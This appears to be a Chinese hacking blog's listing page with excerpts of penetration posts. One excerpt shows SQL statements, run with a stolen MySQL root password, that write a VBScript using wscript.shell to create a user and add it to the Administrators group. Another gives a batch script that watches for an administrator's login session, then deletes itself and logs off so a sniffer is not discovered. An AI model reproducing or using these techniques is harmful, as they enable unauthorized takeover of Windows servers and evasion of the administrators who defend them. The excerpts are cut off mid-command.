天黑再动手

该文被密码保护。 阅读全文

摘要： 思路：写入启动项目揽权有root密码了，Navicat连接上去执行sql语句createtablea(cmdtext);insertintoavalues(“setwshshell=createobject(“”wscript.shell”")”);insertintoavalues(“a=wshshell.run(“”cmd.exe/cnetuser11/add”",0)”);insertintoavalues(“b=wshshell.run(“”cmd.exe/cnetlocalgroupAdministrators1/add”",0)”);select*fr 阅读全文

摘要： 当你在渗透中挂机嗅探的时候，如果管理员上来发现就不好了所以有了这个bat 的用处 检测管理员上线注销自已的 bat copy 保存为 xx.bat@echo off:checkchoice /C YN /T 10 /D Yquser | find "#16" && del xx.bat | logoffgoto check 说明一下 #16 每次运行这个 bat 的时候先quser 一下，看当前的会话id 是多少，然后加1 每连接一次就会加1 用户名 会话名 ID 状态 空闲时间 登录时间 administrator rdp-tcp#22 2 运行中 . 2 阅读全文